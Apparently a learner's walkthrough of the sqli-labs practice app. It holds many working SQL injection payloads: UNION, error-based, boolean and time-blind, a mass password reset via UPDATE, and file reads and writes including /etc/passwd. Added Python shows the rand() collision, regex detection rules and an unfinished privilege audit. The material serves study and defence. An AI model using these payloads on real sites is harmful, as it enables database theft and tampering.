mysql>select (concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables;
mysql>select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c;
select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a;
in the front end, i.e. the website login page,
" AND (select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a) #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection BLIND Boolean and Timebased
localhost/sqli-labs/Less-16/
try all the possibilities to break the query,
since it is blind we assume we have broken the query; we find out what breaks it by guessing what fixes it.
' # OR " # OR ') # OR ") # OR ')) # OR ")) #
") or 1=1 # --> fixes the query, which means ") is used by the developer
") and sleep(10) # --> didn't work
") or sleep(10) # --> worked, displayed as "waiting for localhost"
the developer's query is like,
select col1, col2 from table where username=("") AND sleep(15) # ") and password=("some data"); --> didn't work
select col1, col2 from table where username=("SOME DATA") AND sleep(15) # ") and password=("some data"); --> worked
Timebased:
admin") and if(1=1,sleep(10),null) #
admin") and if(database()='security',sleep(10),null) #
Boolean based:
admin") and (select database()='security') #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection in UPDATE Query
localhost/sqli-labs/Less-17/
URL loaded is a password reset page.
from backend database,
mysql>select * from users where username="admin";
mysql>update users SET password='12345' where username='admin';
assuming the query created by the developer is,
UPDATE users SET password="some variable" where username="admin";
here, trying combinations of values:
'/' --> didn't break
"/" --> didn't break
' --> didn't break
" --> didn't break
/ --> didn't break
admin/' --> broken
admin/' or 1=1 # --> successfully logged in, which means the query is fixed
the above query has changed the password for all the users in the users table,
UPDATE users SET password='' or 1=1 # ' where username='admin';
Since it is a password update page it does not display anything from the database to us, so we use DOUBLE QUERY INJECTION to produce errors, and through those errors we enumerate the information we want.
' AND (select 1 from (select count(*),(concat("~",(select @@datadir),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a) #
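Lab 5's double-query notes, the Less-14 login page and the Less-17 update page all depend on count(*) ... floor(rand(0)*2) ... group by raising a duplicate-key error whose text carries the injected value. The Python block below is an added example, not code from the notes or from sqli-labs, that shows why: it ports MySQL's RAND(seed) generator and models GROUP BY filling its temporary table, evaluating the key once for the lookup and again for the insert. The '::security::' prefix is a constructed sample.

```python
import random

MAX_VALUE = 0x3FFFFFFF  # modulus used by MySQL's my_rnd()


class MySqlRand:
    """MySQL RAND(seed): seeding as in Item_func_rand::seed_random, stepping as in my_rnd()."""

    def __init__(self, seed: int):
        self.seed1 = ((seed * 0x10001 + 55555555) & 0xFFFFFFFF) % MAX_VALUE
        self.seed2 = ((seed * 0x10000001) & 0xFFFFFFFF) % MAX_VALUE

    def next(self) -> float:
        self.se1 = None  # placeholder removed below
        self.seed1 = (self.seed1 * 3 + self.seed2) % MAX_VALUE
        self.seed2 = (self.seed1 + self.seed2 + 33) % MAX_VALUE
        return self.seed1 / MAX_VALUE


class DuplicateEntry(Exception):
    """Stands in for MySQL ERROR 1062 (23000): Duplicate entry ... for key 'group_key'."""


def simulate_group_by(n_rows: int, key_prefix: str, next_random=None) -> dict:
    """Model of  SELECT count(*), concat(key_prefix, floor(rand()*2)) a FROM t GROUP BY a
    over n_rows input rows.  MySQL evaluates the GROUP BY key once to look the group up
    in its temporary table and, if the group is new, again when inserting it.  With a
    non-deterministic key the two values can differ, so the inserted key may already
    exist: that is the duplicate-key error, and its text carries the key, i.e. whatever
    was concatenated into it.  Mitigation is the same as for every variant in these
    notes: bind parameters, and never return raw database error text to the client."""
    if next_random is None:
        next_random = MySqlRand(0).next          # rand(0): deterministic sequence
    groups: dict = {}
    for row in range(1, n_rows + 1):
        key = f"{key_prefix}{int(next_random() * 2)}"   # floor(rand()*2): 0 or 1
        if key in groups:                                # group exists: just count it
            groups[key] += 1
            continue
        key = f"{key_prefix}{int(next_random() * 2)}"   # new group: key re-evaluated for the insert
        if key in groups:
            raise DuplicateEntry(f"row {row}: Duplicate entry '{key}' for key 'group_key'")
        groups[key] = 1
    return groups


def error_text(key_prefix: str, n_rows: int = 3, next_random=None):
    """Return the error message the query would raise, or None if it completes."""
    try:
        simulate_group_by(n_rows, key_prefix, next_random)
    except DuplicateEntry as exc:
        return str(exc)
    return None


def trials_until_error(key_prefix: str, n_rows: int, max_trials: int = 100) -> int:
    """Unseeded rand(): how many runs it takes before the collision shows up.
    This is the 'after a few tries' the notes mention; rand(0) removes the guesswork."""
    for trial in range(1, max_trials + 1):
        if error_text(key_prefix, n_rows, random.random) is not None:
            return trial
    return -1


if __name__ == "__main__":
    rng = MySqlRand(0)
    print("floor(rand(0)*2) sequence:", [int(rng.next() * 2) for _ in range(8)])
    print("2 rows:", error_text("::security::", 2))   # completes, no error
    print("3 rows:", error_text("::security::", 3))   # row 3: Duplicate entry '::security::1' ...
    print("unseeded rand() needed", trials_until_error("::security::", 3), "trial(s)")
```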
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
url : http://localhost/sqli/Less-1/
http://localhost/sqli/Less-1/?id=1
http://localhost/sqli/Less-1/?id=1%27%20--+
' (semi-colon)= %27
space = %20
http://localhost/sqli/Less-1/?id=1
http://localhost/sqli/Less-1/?id=1'
http://localhost/sqli/Less-1/?id=1'space
http://localhost/sqli/Less-1/?id=1' --=
http://localhost/sqli/Less-1/?id=1' --+
http://localhost/sqli/Less-1/?id=1"
http://localhost/sqli/Less-1/?id=1" --+
http://localhost/sqli/Less-1/?id=1" --=
http://localhost/sqli/Less-1/?id=1" --+
To find out columns in a table, we use “order by”
http://localhost/sqli/Less-1/?id=1 order by 9 --+ → Unknown column '9'
http://localhost/sqli/Less-1/?id=1 order by 5 --+ → Unknown column '5'
http://localhost/sqli/Less-1/?id=1 order by 4 --+ → Unknown column '4'
http://localhost/sqli/Less-1/?id=1 order by 3 --+ → “success”
Result: Total 3 columns
http://localhost/sqli/Less-1/?id=1' union select 1,2,3 --+
Union: union will work only all the columns has same number of fields else error will be displayed.
http://localhost/sqli/Less-1/?id=1' union select 1,2,3 --+ → result displayed from 1 column
http://localhost/sqli/Less-1/?id=23451' union select 1,2,3 --+ → to escape from the column 1 result we will be changing the id value which is not exits in the column
http://localhost/sqli/Less-1/?id=14' union select 1,2,3 --+ → we get results till 14, means there are only 14 row or id values
http://localhost/sqli/Less-1/?id=15' union select 1,2,3 --+ → from id value 15, 2nd and 3rd query will be executed accordingly
http://localhost/sqli/Less-1/?id=23451' union select 1,version(),3 --+ → we injected to run the version of database query in 2nd position to run and we got 5.5.59-0ubuntu0.14.04.1
http://localhost/sqli/Less-1/?id=23451' union select 1,version(),database() --+ → to know the database, we have injected database() and the result we got security
Information schema has all the information of databases and tables.
TABLE_SCHEMA = database name
TABLE_NAME = table name of the database
COLUMN_NAME = column name of the table
so here query will be,
select TABLE_NAME from Information.schema.COLUMNS where TABLE_SCHEMA=security;
http://localhost/sqli/Less-1/?id=15' union select 1,(select TABLE_NAME from Information_schema.COLUMNS where TABLE_SCHEMA='security'),version() --+ → result: subquery returns more than 1 row
http://localhost/sqli/Less-1/?id=23451' union select 1,user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,system_user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,current_user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,schema(),session_user() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+ → displayed one of the table name
to find out next table one by one we use limit,
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1 --+ → result of 1st table name
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1 --+ → result of 2nd table name
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 --+ → result of 3rd table name
instead of find table name seperately, we can use group_concat command to display in one statement,
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ → we have got all the tables listed below,
Table name: email, referers, uagents, users
Database name: security
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(username),group_concat(password) from users --+
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(username),3 from users --+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab: 2
Url: http://localhost/sqli/Less-2/
http://localhost/sqli/Less-2/?id=0 → no result
http://localhost/sqli/Less-2/?id=1 → result
http://localhost/sqli/Less-2/?id=12 → result
http://localhost/sqli/Less-2/?id=13 → no result; we got results up to 12, meaning 12 records are available
http://localhost/sqli/Less-2/?id=nesdfs → no result
http://localhost/sqli/Less-2/?id=ndfs1234 → no result
http://localhost/sqli/Less-2/?id=10938429379845 → no result
http://localhost/sqli/Less-2/?id=1\ → '\ LIMIT 0,1'
http://localhost/sqli/Less-2/?id=1' → got an error from MySQL, '' LIMIT 0,1'
http://localhost/sqli/Less-2/?id=1'spacespace → error not fixed
http://localhost/sqli/Less-2/?id=1' --+ → error not fixed
http://localhost/sqli/Less-2/?id=1' --= → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or '1=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1='1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1'=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' # → error not fixed
since the developer didn't wrap the value in a single quote ('), a double quote (") or brackets ( ), we can inject SQL directly
localhost/sqli/Less-2/?id=-1 union select 1,database(),version() → injection worked
the rest of the information can be enumerated as above.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab:3
URL: 192.168.93.156/sqli/Less-3/?id=1
' ' 1' ') LIMIT 0,1 '
' ' 1\ ') LIMIT 0,1 '
' ') LIMIT 0,1 '
http://192.168.93.156/sqli/Less-3/?id=1') --> Broken the command
http://192.168.93.156/sqli/Less-3/?id=1') --+ --> Fixed the broken command
http://192.168.93.156/sqli/Less-3/?id=1') order by 4 --+ --> Unknown column '4' in 'order clause'
http://192.168.93.156/sqli/Less-3/?id=1') order by 3 --+ --> Results are displayed
http://192.168.93.156/sqli/Less-3/?id=-1') union select 1,5,4 --+
http://192.168.93.156/sqli/Less-3/?id=-1') union select 1,database(),version() --+
database name = security
sql version = 5.5.59-0ubuntu0.14.04.1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab:4
URL: http://192.168.93.156/sqli/Less-4/?id=1"
http://192.168.93.156/sqli/Less-4/?id=1" --> Broken the code
' " 1" ") LIMIT 0,1 '
http://192.168.93.156/sqli/Less-4/?id=1") --> Broken the code
' ") LIMIT 0,1 '
http://192.168.93.156/sqli/Less-4/?id=1") or (" --> Fixed the code
http://192.168.93.156/sqli/Less-4/?id=1")--+ --> Fixed the code
http://192.168.93.156/sqli/Less-4/?id=1") union select 1,2,3,4 or (" --> SELECT statements have a different number of columns
http://192.168.93.156/sqli/Less-4/?id=-1") union select 1,55,378 or (" --> 2nd column is working
http://192.168.93.156/sqli/Less-4/?id=-1") union select 1,2,3 --+ --> 2nd and 3rd columns are working
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab: 5
URL: http://192.168.93.156/sqli/Less-5/?id=1
http://192.168.93.156/sqli/Less-5/?id=1' --> Query breaks on ['] and it is vulnerable to SQL injection [''1'' LIMIT 0,1']
http://192.168.93.156/sqli/Less-5/?id=1" --> Page displays as normal; not vulnerable for ["]
http://192.168.93.156/sqli/Less-5/?id=1\ --> Query breaks on [\] and it is vulnerable to SQL injection [''1\' LIMIT 0,1']
http://192.168.93.156/sqli/Less-5/?id=1\ --+ --> Query fixed by commenting out the rest [--]
http://192.168.93.156/sqli/Less-5/?id=1' --+ --> Query fixed by commenting out the rest [--]
http://192.168.93.156/sqli/Less-5/?id=1' '1 --> Query fixed by matching the quote
http://192.168.93.156/sqli/Less-5/?id=1' order by 1 and '1 --> To find the number of columns we used "order by", but it didn't help
"Order by" does not work if you are not using comments. We have to go for trial and error.
http://192.168.93.156/sqli/Less-5/?id=1' union select 1 and '1 --> doesn't work
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2 and '1 --> doesn't work
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2,3 and '1 --> it works, meaning there are 3 columns
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2,3,4 and '1 --> doesn't work
Developer's query is,
select col1, col2, col3 from table_name where id='$your_input';
Since no query output is displayed and the only thing we can see is a SQL error, if we can produce MySQL errors in a controlled way we can extract whatever information is required for the enumeration.
select count(*) from information_schema.tables;
select rand();
select floor(2.4536759379374);
select floor(rand()*2);
here the column title shows what we provided; we can give it an alias.
select floor(rand()*2)as dump; [or]
select floor(rand()*2)dump
useful: select table_name, table_schema from information_schema.tables group by table_schema;
select database();
select (select database());
select concat((select database()));
select concat(0x3a,0x3a,(select database()),0x3a,0x3a); --> 0x3a is the hex value of ':' (a colon), used as a delimiter
select concat(0x3a,0x3a,(select database()),0x3a,0x3a)as aaa; --> Alias set to aaa
select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))as aaa; --> Added some randomness with the floor function
select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.tables;
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> After some tries we got an error message. This error is generated by the randomness and it dumped "Database: 'security'"
select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> It dumped "Database version: 5.1.62"
select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays the second table name
select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays the third table name
select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays the first table name
(select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa)bbb);
By changing the limit values, we can get the names of all the tables
To find out the column names,
(select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,0x3a, round(rand()*2,1))as aaa from information_schema.columns group by aaa)bbb);
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Double Query Injection:
localhost/sqli-labs/Less-5/?id=1
localhost/sqli-labs/Less-5/?id=2
localhost/sqli-labs/Less-5/?id=3
localhost/sqli-labs/Less-5/?id=1'
localhost/sqli-labs/Less-5/?id=1\
select col1,col2,col3 from table where id=' 1' OR '1 '
localhost/sqli-labs/Less-5/?id=1' --+
localhost/sqli-labs/Less-5/?id=1' #
There is no way to display the output of our query from the database. We have to create error messages in a controlled way to get output from the database; hence it is semi-blind SQL injection.
some functions from the database,
mysql>select count(*) from information_schema.tables;
mysql>select count(*) from information_schema.columns;
mysql>select rand();
mysql>select rand()*4;
mysql>select floor(2.4536759379374);
mysql>select rand()*2;
mysql>select floor(rand()*2);
mysql>select floor(rand()*2)as dumb;
mysql>select floor(rand()*2)dumb;
mysql>select table_name,table_schema from information_schema.tables group by table_schema;
mysql>select database();
mysql>select (select database());
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a);
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a;
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns;
mysql>select concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables;
mysql>select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
--> error, subquery returns more than 1 row because we didn't use LIMIT
mysql>select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 2,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Double Query Injection: Continued...
select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a;
Need to wrap it in parentheses '()' in the frontend
(select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a) ->> it gave an error, i.e., operand should contain 1 column
To fix the above query,
(select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b)
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)) --+
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+
we can use the "round" function instead of floor,
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a, round(rand()*2,1))a from information_schema.columns group by a)b) --+
we can enumerate the column names as well,
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name="users" limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+ --> displays the 1st column name
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name="users" limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+ --> displays the 2nd column name
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Blind Injection - Boolean Based
URL: localhost/sqli-labs/Less-8/?id=1
localhost/sqli-labs/Less-8/?id=1' --> didn't get a result
localhost/sqli-labs/Less-8/?id=1' --+ --> some results are displayed as expected
localhost/sqli-labs/Less-8/?id=1' AND 1 --+ --> displayed some results
localhost/sqli-labs/Less-8/?id=1' AND 0 --+ --> intentionally false statement, result as expected
If we inject a query, nothing is displayed, as this is blind SQL injection.
Even errors are missing.
From the backend database,
use security;
select database();
select length(database());
select substr(database(),1,1); --> the substring function takes 3 parameters (string, start position, number of characters)
select ascii(substr(database(),1,1));
localhost/sqli-labs/Less-8/?id=1' AND (ascii(substr((select database()),1,1)))=98 --+
localhost/sqli-labs/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100 --+
localhost/sqli-labs/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>102 --+
localhost/sqli-labs/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>101 --+
localhost/sqli-labs/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 --+
We can use tools for the same, like
Burp, ZAP, Fiddler
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Blind Injection - Time Based
In previous lessons something was dumped to the screen, a visible sign that gave us an idea of what was happening.
But here we don't have any sign or differentiation.
From the backend database, we learn a function called sleep()
mysql>use security;
mysql>select sleep(10); --> waits 10 sec before displaying the result
We use the time delay to tell true results from false ones.
mysql>select if(condition, value returned if the condition is true, value returned if the condition is false)
mysql>select if((select database())="security",sleep(10),null);
As there is no sign of the SQL injection on the screen, we make use of the sleep() function
from the application,
localhost/sqli-labs/Less-9/?id=1' and sleep(10) --+ --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select database())="security",sleep(10),null) --+ --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select version()) like "5%",sleep(10),null) --+ --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1),sleep(10),null) --+ --> it works
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dumping Database Using Outfile:
localhost/sqli-labs/Less-7/?id=1 --> Normal results displayed
localhost/sqli-labs/Less-7/?id=7 --> No error
localhost/sqli-labs/Less-7/?id=50 --> Error message
localhost/sqli-labs/Less-7/?id=news --> Error message
localhost/sqli-labs/Less-7/?id=\ --> Error message
localhost/sqli-labs/Less-7/?id=1' --> Error message
localhost/sqli-labs/Less-7/?id=1" --> No Error message
localhost/sqli-labs/Less-7/?id=1' --+ --> Query not fixed
localhost/sqli-labs/Less-7/?id=1') --+ --> Query not fixed
localhost/sqli-labs/Less-7/?id=1')) --+ --> Query is fixed
localhost/sqli-labs/Less-7/?id=2')) --+ --> Query is fixed
localhost/sqli-labs/Less-7/?id=1')) or (('1 --> Query is fixed
localhost/sqli-labs/Less-7/?id=1')){execute command safely} --+ --> Query fixed
Database backend:
use security;
select * from users;
select * from users into outfile "/tmp/test.txt"; -->> Just dumps the complete result into test.txt
select * from users into dumpfile "/tmp/test1.txt"; -->> Error: dumpfile can write only a single row, not more
select * from users limit 0,1 into dumpfile "/tmp/test1.txt"; -->> Error: dumpfile cannot overwrite an existing file
[mysql should not run with root privilege]
select load_file("/etc/passwd") into outfile "/tmp/test4.txt";
localhost/sqli-labs/Less-7/?id=1'))order by 4 --+ -->> displayed an error msg
localhost/sqli-labs/Less-7/?id=1'))order by 3 --+ -->> no error displayed
localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile "/var/www/sqli-labs/Less-7/union1.txt" --+
localhost/sqli-labs/Less-7/union1.txt
localhost/sqli-labs/Less-7/?id=1')) union select 1, database(),version() into outfile "/var/www/sqli-labs/Less-7/union2.txt" --+
localhost/sqli-labs/Less-7/union2.txt
localhost/sqli-labs/Less-7/?id=1')) union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),version() into outfile "/var/www/sqli-labs/Less-7/union3.txt" --+
localhost/sqli-labs/Less-7/union3.txt
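As an added defender-side example (not part of these notes or of sqli-labs), the Python below scans constructed Apache-style access log lines for the request shapes used in the UNION / ORDER BY enumeration, information_schema, double-query (floor/rand), boolean-blind, time-blind and INTO OUTFILE sections above. The log lines, client IPs and rule names are constructed; the regexes are a starting point for a detection rule, not a complete signature set.

```python
import re
from collections import namedtuple
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (not from the lab host): the request
# shapes mirror the probes in these notes, plus two benign requests.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-1/?id=1%27%20order%20by%203%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-1/?id=23451%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20--+ HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/Less-8/?id=1%27%20AND%20(ascii(substr((select%20database()),1,1)))=98%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli/Less-9/?id=1%27%20and%20sleep(10)%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /sqli/Less-7/?id=1%27))%20union%20select%201,2,3%20into%20outfile%20%22/var/www/x.txt%22%20--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /sqli/Less-5/?id=1%27AND%20(select%201%20from%20(select%20count(*),concat(0x3a,(select%20database()),floor(rand()*2))a%20from%20information_schema.columns%20group%20by%20a)b) HTTP/1.1" 500 220
10.0.0.7 - - [01/Jan/2024:10:00:08 +0000] "GET /sqli/Less-1/?id=2 HTTP/1.1" 200 512
"""

# One rule per technique exercised in the notes, matched case-insensitively
# against the URL-decoded request target.
RULES = [
    ("union-select",     r"\bunion\s+(?:all\s+)?select\b"),
    ("order-by-probe",   r"\border\s+by\s+\d+"),
    ("schema-enum",      r"\binformation_schema\."),
    ("error-based-rand", r"\b(?:floor|round)\s*\(\s*rand\s*\("),
    ("boolean-blind",    r"\b(?:ascii|ord)\s*\(\s*(?:substring|substr|mid)\s*\("),
    ("time-blind",       r"\b(?:sleep|benchmark)\s*\("),
    ("file-io",          r"\binto\s+(?:out|dump)file\b|\bload_file\s*\("),
]
COMPILED = [(name, re.compile(pattern, re.I)) for name, pattern in RULES]

# Client address and request target from a combined-format log line.
REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/')

Hit = namedtuple("Hit", "client target rules")


def decode_target(target):
    # unquote_plus turns %27 into ' and '+' into a space, so the "--+" comment
    # trick decodes to "-- " exactly as MySQL sees it after the web server decodes.
    return unquote_plus(target)


def classify(target):
    """Names of every rule that fires on one request target."""
    decoded = decode_target(target)
    return [name for name, rx in COMPILED if rx.search(decoded)]


def scan_log(text):
    """Return a Hit for every log line whose request matches at least one rule."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        rules = classify(m.group("target"))
        if rules:
            hits.append(Hit(m.group("client"), decode_target(m.group("target")), rules))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit.client, ",".join(hit.rules), hit.target, sep="  ")
```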
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dumping Database:
localhost/sqli-labs/Less-7/?id=1')) --+
localhost/sqli-labs/Less-7/?id=1')) or (('1
will test from backend in the database,
mysql>use security;
mysql>show tables;
mysql>select * from users;
mysql>select * from users into outfile "/tmp/test.txt";
mysql>select * from users into dumpfile "/tmp/test1.txt";
mysql>select * from users limit 0,1 into dumpfile "/tmp/test1.txt";
mysql>select * from users limit 0,1 into dumpfile "/tmp/test2.txt";
Outfile: dumps the results of the query to a file.
Dumpfile: writes only one row to a file and cannot overwrite an existing file.
To work around the one-row restriction we use LIMIT.
Loadfile: loads a file from the filesystem into MySQL
mysql>select load_file("/etc/passwd");
mysql>select load_file("/etc/passwd") into outfile "/tmp/test3.txt";
localhost/sqli-labs/Less-7/?id=1')) order by 3 --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile "/tmp/test4.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,database(),version() into outfile "/var/www/sqli-labs/Less-7/union1.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,table_name,3 from information_schema.tables where table_schema='security' into outfile "/var/www/sqli-labs/Less-7/union2.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,table_name,3 from information_schema.tables into outfile "/var/www/sqli-labs/Less-7/union3.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,username,password from users into outfile "/var/www/sqli-labs/Less-7/union4.txt" --+
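The note above that mysql should not run as root points at the real controls behind the outfile / dumpfile / load_file sections: the MySQL FILE privilege (global, included in ALL PRIVILEGES at *.*) and the secure_file_priv setting (NULL disables file import/export, an empty value allows it anywhere mysqld can reach, a directory confines it). As an added example, not from these notes, the Python below audits constructed SHOW GRANTS output and a secure_file_priv value; the account names and grant lines are made up.

```python
import re

# Constructed output of `SHOW GRANTS FOR user@host` (MySQL 5.x format) and the
# value returned by `SHOW VARIABLES LIKE 'secure_file_priv'`. Not from the lab host.
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT SELECT, INSERT, UPDATE, FILE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT ON `security`.* TO 'reporting'@'localhost'",
]
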